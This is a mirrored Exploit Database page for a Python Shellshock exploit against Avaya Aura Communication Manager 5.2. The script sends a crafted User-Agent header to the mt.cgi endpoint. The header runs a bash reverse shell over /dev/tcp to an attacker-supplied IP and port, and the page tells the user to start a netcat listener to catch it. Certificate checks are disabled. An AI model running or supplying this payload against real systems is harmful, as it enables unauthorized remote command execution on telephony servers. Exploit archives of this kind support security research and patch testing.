Avaya Aura Communication Manager 5.2 – Remote Code Execution

• Exploit Database
• 150 阅读

• 作者： Sarang Tumne
  日期： 2020-02-17
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/48077/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52

  # Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution # Exploit Author: Sarang Tumne a.k.a SarT # Date: 2020-02-14 # Confirmed on release 5.2 # Vendor: https://www.avaya.com/en/ # Avaya's advisory: # https://downloads.avaya.com/css/P8/documents/100183151 # Exploit generates a reverse shell to a nc listener (Shellshock Exploit)   ###############################################   #!/usr/bin/python   import sys import requests if len(sys.argv) < 4: print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit" print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>" print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337" print "[*] Netcat Listener: nc -lvvnp <port>" print "\n" sys.exit()   #Disables request warning for cert validation ignore. requests.packages.urllib3.disable_warnings() CM = sys.argv[1] url = "https://" + CM + "/mt/mt.cgi" attacker_ip = sys.argv[2] rev_port = sys.argv[3]   http_headers = { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1' }   def main(): if len(sys.argv) == 4: print "[+] Success, spawning a shell on your custom port :)..." requests.get(url, headers=http_headers, verify=False, timeout=5) else: print "[-] Something went wrong, quitting..." sys.exit()   if __name__ == "__main__": main()